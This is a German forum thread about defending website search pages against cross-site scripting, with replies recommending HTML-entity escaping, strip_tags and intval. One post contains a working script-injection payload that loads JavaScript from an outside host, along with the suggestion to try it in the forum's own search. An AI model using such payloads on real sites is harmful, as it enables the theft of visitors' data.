| Cross-Scripting |
KeyLF
Forenheld
Beiträge: 872
|
Also wem sagt das was bzw... wer hatte das Problem schon einmal und konnte seine Seiten absichern... wäre für jeden Tip dankbar...
Es gebt speziell um Suchabfragen auf Seiten, hab das Problem erstmal mit StripTags gelöst aber ich denke mal das ist nicht unbedingt ne saubere Lösung...
also wenn jemand helfen kann... wäre ich sehr dankbar.
MFG
KeyLF
|
| Profil
Editieren
Zitieren
|
alexhaid
Fachidiot
Beiträge: 132
|
Was ist es denn?
Vielleicht kann man dann besser helfen.
lg, alex
|
| Profil
E-Mail
Editieren
Zitieren
|
KeyLF
Forenheld
Beiträge: 872
|
Das heisst, du kannst Fremde Scripte auf deinem Server ausführen... z.B. wenn du in einer Suche (auch hier bei Webwork) in einer gewissen Syntax eine Url mit einem Script (z.B. JS-Datei) übergibst wird dieses dann "auf der Seite" ausgeführt.
Z.b. zum Auslesen von Userdaten etc. oder ich mach ein Fake Gewinnspiel schreib das in einen Newsletter und geb das Script mit... somit läuft alles anscheinend auf der "Vertrauenswürden Seite" aber die Daten werden ganz woanders hin übermittelt.
|
| Profil
Editieren
Zitieren
|
Can
Halbgott
Beiträge: 1330
|
Hm, das sagt mir eigentlich nur was im Zusammenhang mit MySQL, wenn magic_quotes nicht aktiviert ist. Meinst du das?
---
"S-púrlawits'chkâ A-ngáse gûrewüdíx" - Zaphrot Bibelprox
|
| Profil
E-Mail
Editieren
Zitieren
|
KeyLF
Forenheld
Beiträge: 872
|
Was wären die Auswirkungen wenn das aktiviert ist bzw. nicht?!
Such mal hier im Forum über die Suche, genau folgendes:
1: | <script + src= http://lab.saljut.de/form.js></script> |
|
| Profil
Editieren
Zitieren
|
Can
Halbgott
Beiträge: 1330
|
Na ja, unter bestimmten Vorraussetzungen wäre es möglich, SQL-Code auszuführen, wenn in nem Script einfach steht mysql_query("SELECT * FROM `bla` WHERE id=\"$id\"").
In deinem Fall muss man halt einfach < und > bei der Ausgabe durch die entsprechenden HTML-Entities ersetzen!?
---
"S-púrlawits'chkâ A-ngáse gûrewüdíx" - Zaphrot Bibelprox
|
| Profil
E-Mail
Editieren
Zitieren
|
KeyLF
Forenheld
Beiträge: 872
|
richtig... aber ist ja auch nicht unbedingt die feinste lösung... mach das im moment so
1: | $search = strip_tags($search); |
aber ich denk mal das muss doch auch auf dem Server einstellbar sein oder?!
|
| Profil
Editieren
Zitieren
|
languitar
Foren-Team
Beiträge: 2795
|
Nein, das muss nicht serverseitig einstellbar sein. Man muss schon selber ein bisschen aufpassen, dass man seine Scripte sicher gestalltet.
---
Take a look here!
Lichtblick - Einblick - Ausblick
|
| Profil
E-Mail
Website
Editieren
Zitieren
|
Philipp Gérard
Foren-Team
Beiträge: 1508
|
GET-Zahlen einfach abfangen und mit intval checken... für html & js gelten, korrekt, richtlinien wie strip_tags.
---
Arbeit ist das Feuer der Gestaltung. - Marx
|
| Profil
E-Mail
Website
Editieren
Zitieren
|
